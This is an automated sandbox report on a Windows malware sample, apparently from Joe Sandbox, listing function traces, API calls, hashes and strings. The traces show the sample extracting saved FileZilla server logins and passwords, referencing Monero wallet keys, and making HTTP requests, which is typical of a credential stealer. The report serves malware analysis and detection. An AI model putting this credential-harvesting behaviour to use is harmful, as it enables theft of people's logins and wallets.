                                • StrCmpCA.SHLWAPI(?,00EE15BC), ref: 00ECF76F
                                • StrCmpCA.SHLWAPI(?,00EE15C0), ref: 00ECF785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECFAB1
                                • FindClose.KERNEL32(000000FF), ref: 00ECFAC3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 9d6b0516e8152cf1e191ea057d921674d472549c9eb08b710ccf519b93f74b4f
                                • Instruction ID: 0b28c31c141b710e9839ec6755b03d1e2692a4b7f088d1e603470707feb61bfa
                                • Opcode Fuzzy Hash: 9d6b0516e8152cf1e191ea057d921674d472549c9eb08b710ccf519b93f74b4f
                                • Instruction Fuzzy Hash: 3911753580014D9BDB18EB60DC55AED73B8EF10300F5452BBA51A66592EF302B4BD752
                                Function 0126EAFD Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Bn{?
                                • API String ID: 0-683484288
                                • Opcode ID: 74c5f80c6dc29c1f4d9ef5710b49bcf5271de31761435eb0dae13e8369170a65
                                • Instruction ID: 6f0cca3fd40dbff9f6c525d79d8a64b5f4431ddf81f3f6a80dec3a1a7b14f724
                                • Opcode Fuzzy Hash: 74c5f80c6dc29c1f4d9ef5710b49bcf5271de31761435eb0dae13e8369170a65
                                • Instruction Fuzzy Hash: D66128F3E191205BE7146E29DC4576AFADAEBD4320F1B863DDAC893784E9355C0487C2
                                Function 0128B17A Relevance: .8, Instructions: 771COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4074e47ec79813d78b52a1a868e34b04fe6ad73dbcc91530e7a4679db1f75f2e
                                • Instruction ID: 67302b7559dcf3359941d51f59ef177ea275986b28dc1f12c426fb3e8d08faa0
                                • Opcode Fuzzy Hash: 4074e47ec79813d78b52a1a868e34b04fe6ad73dbcc91530e7a4679db1f75f2e
                                • Instruction Fuzzy Hash: 92323AF3A082149FE3046E2DEC8567AFBE9EF94760F1A493DEAC4D3340E93558058697
                                Function 011BD26B Relevance: .2, Instructions: 154COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b87503b168c8fd93e199e347fa559f9194e5431ce1ddd52a60334a783de15161
                                • Instruction ID: bb2fb372db878d9dfdf67db8d65cf912b99430013bc24612d2053fa5cb719a93
                                • Opcode Fuzzy Hash: b87503b168c8fd93e199e347fa559f9194e5431ce1ddd52a60334a783de15161
                                • Instruction Fuzzy Hash: 4841F2B3B142141FF300A92EDD857B677CADBC4760F1AC53ADA84C7784E9398C0642D1
                                Function 0116638E Relevance: .2, Instructions: 151COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e9217be0083c5822ed045cd1a6b8ea2c4e313c2926c837543a41ada68a9d9cab
                                • Instruction ID: 43fb9dd58a954af2773345109e7f4d5174ce9d16ef45b16b50810132111d4a5d
                                • Opcode Fuzzy Hash: e9217be0083c5822ed045cd1a6b8ea2c4e313c2926c837543a41ada68a9d9cab
                                • Instruction Fuzzy Hash: 525104B3E046109BE3445E29DC8432AFAE5EFD4720F2BC93DDAC857785D6394C458786
                                Function 011FCDFA Relevance: .1, Instructions: 76COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 90674befd680ca1b2570b7f027c4df6d0badee27096a3921d918a850ff990f25
                                • Instruction ID: 9c26e244f413dfa2273ee97fc000dd732d4e5b0b6c1b437da6355c25724e18ef
                                • Opcode Fuzzy Hash: 90674befd680ca1b2570b7f027c4df6d0badee27096a3921d918a850ff990f25
                                • Instruction Fuzzy Hash: 6B2105F3E186205BF3446E6CCC49326B6DAEB94310F2B853CDAC8937C4ED39580486DA
                                Function 00ED9750 Relevance: .0, Instructions: 15COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                Function 00ED0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00EE0DBA,00EE0DB7,00EE0DB6,00EE0DB3), ref: 00ED0362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED0369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00ED0385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00ED03CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED03DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00ED0419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00ED0463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED0532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00ED0562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00ED0571
                                • lstrcat.KERNEL32(?,url: ), ref: 00ED0580
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0593
                                • lstrcat.KERNEL32(?,00EE1678), ref: 00ED05A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05B5
                                • lstrcat.KERNEL32(?,00EE167C), ref: 00ED05C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00ED05D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED05E6
                                • lstrcat.KERNEL32(?,00EE1688), ref: 00ED05F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00ED0604
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED0617
                                • lstrcat.KERNEL32(?,00EE1698), ref: 00ED0626
                                • lstrcat.KERNEL32(?,00EE169C), ref: 00ED0635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00EE0DB2), ref: 00ED068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 5956b814e231a8a35845101a060fdd90071be2d03ba3e98bb089f6bc737acd9d
                                • Instruction ID: 6f15bd4fe41e905068fb3c2150b2d5b7965ee2d09dd562d3291648fdf4d841d7
                                • Opcode Fuzzy Hash: 5956b814e231a8a35845101a060fdd90071be2d03ba3e98bb089f6bc737acd9d
                                • Instruction Fuzzy Hash: 2DD14F76D002089BCB08EBF0DD9AEEE7778EF14300F44552AF512B7185EE74AA46DB61
                                Function 00EC5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                  • Part of subcall function 00EC47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EC4839
                                  • Part of subcall function 00EC47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EC4849
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EC59F8
                                • StrCmpCA.SHLWAPI(?,01B8E220), ref: 00EC5A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EC5B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,01B8E3C0,00000000,?,01B89B58,00000000,?,00EE1A1C), ref: 00EC5E71
                                • lstrlen.KERNEL32(00000000), ref: 00EC5E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EC5E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC5E9A
                                • lstrlen.KERNEL32(00000000), ref: 00EC5EAF
                                • lstrlen.KERNEL32(00000000), ref: 00EC5ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EC5EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00EC5F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EC5F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EC5F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FBD
                                • HttpOpenRequestA.WININET(00000000,01B8E250,?,01B8DA10,00000000,00000000,00400100,00000000), ref: 00EC5BF8
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • InternetCloseHandle.WININET(00000000), ref: 00EC5FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.2156997211.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157012241.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000012AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.0000000001396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157170594.00000000013CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157472097.00000000013D0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157585260.0000000001573000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2157600588.0000000001574000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 6ec59c9878d46a683d937cad0768e18457f25b8c4def870929306379e23668a5
                                • Instruction ID: b2e44ec00474f375440ad1df2e1bc411259c2e6df8b3870dae52860e677b4bb3
                                • Opcode Fuzzy Hash: 6ec59c9878d46a683d937cad0768e18457f25b8c4def870929306379e23668a5
                                • Instruction Fuzzy Hash: 65122176820118AACB19EBA0DC95FEE73B8FF54700F4451BAB50672191EF702B8ACF55
                                Function 00ECCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
